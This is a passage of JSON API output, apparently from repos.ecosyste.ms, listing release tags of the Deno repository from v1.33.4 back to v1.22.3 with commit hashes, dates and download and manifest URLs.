2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/